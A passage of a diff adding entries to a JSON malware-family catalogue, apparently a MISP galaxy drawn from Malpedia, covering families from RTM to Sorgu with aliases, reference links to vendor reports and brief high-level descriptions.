"https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" + ] + }, + "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", + "value": "RTM", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos", + "https://boozallenmts.com/resources/news/rtpos-new-point-sale-malware-family-uncovered" + ] + }, + "uuid": "89ee2cb0-2c72-4a25-825b-bb56083fdd9b", + "value": "rtpos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv", + "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear" + ] + }, + "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2", + "value": "Ruckguv", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish" + ] + }, + "uuid": "e1564cfe-ab82-4c14-8f92-65af0d760d70", + "value": "Rumish", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat", + "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" + ] + }, + "uuid": "b746a645-5974-44db-a811-a024214b7fba", + "value": "running_rat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "RCSU" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar", + "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction" + ] + }, + "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", + "value": "Rurktar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", + "https://www.secureworks.com/blog/research-21041", + 
"http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", + "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", + "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", + "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/", + "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", + "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf", + "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/" + ] + }, + "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d", + "value": "Rustock", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Saga" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom", + "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", + "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", + "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/", + "http://malware-traffic-analysis.net/2017/10/13/index.html" + ] + }, + "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", + "value": "SAGE", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Sakurel" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", + "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", + "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", + "https://www.secureworks.com/research/sakula-malware-family" + ] + }, + "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b", + "value": "Sakula RAT", + "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files 
onto the compromised computer." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea", + "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf" + ] + }, + "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", + "value": "Salgorea", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" + ] + }, + "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a", + "value": "Sality", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", + "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", + "http://blog.talosintel.com/2016/03/samsam-ransomware.html", + "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", + "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/" + ] + }, + "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", + "value": "SamSam", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Daws" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny", + "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" + ] + }, + "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", + "value": "Sanny", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Hussarini" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a", + 
"https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html" + ] + }, + "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e", + "value": "Sarhust", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", + "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", + "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", + "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" + ] + }, + "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", + "value": "Satan Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", + "https://www.cylance.com/threat-spotlight-satan-raas" + ] + }, + "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", + "value": "Satana", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot", + "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" + ] + }, + "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369", + "value": "Sathurbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", + "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", + "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos" + ] + }, + "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", + "value": "ScanPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken", + 
"https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", + "https://github.com/vithakur/schneiken" + ] + }, + "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d", + "value": "Schneiken", + "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.scote", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/" + ] + }, + "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", + "value": "Scote", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker", + "https://twitter.com/struppigel/status/791535679905927168" + ] + }, + "uuid": "9803b201-28e5-40c5-b661-c1a191388072", + "value": "ScreenLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + ] + }, + "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", + "value": "SeaDaddy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", + "value": "SeaSalt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll", + 
"https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "272268bb-2715-476b-a121-49142581c559", + "value": "SeDll", + "description": "" + }, + { + "meta": { + "synonyms": [ + "azzy", + "eviltoss" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf" + ] + }, + "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75", + "value": "Sedreco", + "description": "" + }, + { + "meta": { + "synonyms": [ + "jhuhugit", + "jkeyskw", + "downrage", + "carberplike" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", + "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/", + "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", + "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", + "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", + 
"https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", + "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed", + "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", + "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" + ] + }, + "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", + "value": "Seduploader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" + ] + }, + "uuid": "503ca41c-7788-477c-869b-ac530f20c490", + "value": "SendSafe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico" + ] + }, + "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", + "value": "Serpico", + "description": "" + }, + { + "meta": { + "synonyms": [ + "XShellGhost" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", + "https://securelist.com/shadowpad-in-corporate-networks/81432/", + "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", + "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" + ] + }, + "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", + "value": "ShadowPad", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", + "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", + "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" + ] + }, + "uuid": "f64683c8-50ab-42c0-8b90-881598906528", + "value": "Shakti", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + ] + }, + "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6", + "value": "SHAPESHIFT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "remotecmd" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip", + "https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" + ] + }, + "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", + "value": "shareip", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bitrep" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf", + "https://eromang.zataz.com/tag/agentbase-exe/" + ] + }, + "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", + "value": "SHARPKNOT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker", + "https://twitter.com/JaromirHorejsi/status/813726714228604928" + ] + }, + "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", + "value": "ShellLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" + ] + }, + "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", + "value": "Shifu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", + "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" + ] + }, + "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", + "value": "Shim RAT", + "description": "" + }, + { + "meta": { + 
"synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin", + "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/", + "http://www.nyxbone.com/malware/chineseRansom.html" + ] + }, + "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", + "value": "Shujin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" + ] + }, + "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", + "value": "Shurl0ckr", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Caphaw" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock", + "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", + "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", + "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", + "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw", + "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", + "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/" + ] + }, + "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", + "value": "Shylock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", + "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", + "https://s.tencent.com/research/report/479.html" + ] + }, + "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8", + "value": "win.sidewinder", + 
"description": "" + }, + { + "meta": { + "synonyms": [ + "Destover" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" + ] + }, + "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", + "value": "Sierra(Alfa,Bravo, ...)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6" + ] + }, + "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", + "value": "Siggen6", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", + "https://securelist.com/the-silence/83009/", + "http://www.intezer.com/silenceofthemoles/", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", + "value": "Silence", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", + "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html", + "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm" + ] + }, + "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", + "value": "Silon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur" + ] + }, + "uuid": "774fcb67-1eeb-4bda-9b36-b624b632417a", + "value": "Siluhdur", + "description": "" + }, + { + "meta": { + "synonyms": [ + "iBank" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", + "https://secrary.com/ReversingMalware/iBank/" + ] + }, + "uuid": 
"467ee29c-317f-481a-a77c-69961eb88c4d", + "value": "Simda", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Theola", + "Quarian", + "Mebroot", + "Anserin", + "Torpig" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", + "https://en.wikipedia.org/wiki/Torpig", + "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", + "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/", + "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan" + ] + }, + "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018", + "value": "Sinowal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", + "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" + ] + }, + "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", + "value": "Sisfader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skarab_ransom", + "http://malware-traffic-analysis.net/2017/11/23/index.html" + ] + }, + "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", + "value": "Skarab Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" + ] + }, + "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", + "value": "Skyplex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave", + "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/" + ] + }, + "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", + "value": "Slave", + "description": "" + }, + { + "meta": { + 
"synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", + "https://securelist.com/apt-slingshot/84312/", + "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", + "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" + ] + }, + "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", + "value": "Slingshot", + "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer" + }, + { + "meta": { + "synonyms": [ + "speccom" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" + ] + }, + "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", + "value": "smac", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Dofoil" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", + "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", + "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", + 
"https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", + "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", + "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", + "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", + "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", + "https://www.cert.pl/en/news/single/dissecting-smoke-loader/" + ] + }, + "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec", + "value": "SmokeLoader", + "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body." 
+ }, + { + "meta": { + "synonyms": [ + "Ismo" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru", + "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", + "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" + ] + }, + "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", + "value": "Smominru", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", + "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/", + "https://twitter.com/VK_Intel/status/898549340121288704", + "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", + "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/" + ] + }, + "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20", + "value": "SnatchLoader", + "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns." 
+ }, + { + "meta": { + "synonyms": [ + "ByeByeShell" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy", + "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" + ] + }, + "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", + "value": "SNEEPY", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ursnif" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", + "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" + ] + }, + "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", + "value": "Snifula", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan", + "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" + ] + }, + "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", + "value": "Snojan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker" + ] + }, + "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", + "value": "SNS Locker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" + ] + }, + "uuid": "81e4fc8f-7b05-42bf-8ff9-568362d4f964", + "value": "Sobaken", + "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" + ] + }, + "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", + "value": "Socks5 Systemz", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BIRDDOG", + "Nadrac" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", + "value": "SocksBot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Napolar" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", + "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", + "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" + ] + }, + "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", + "value": "Solarbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", + "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper", + "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" + ] + }, + "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", + "value": "soraya", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + ] + }, + "uuid": "bc135ba5-637b-46c9-94fc-2eef5e018bb5", + "value": "Sorgu", + "description": "" + }, + { + 
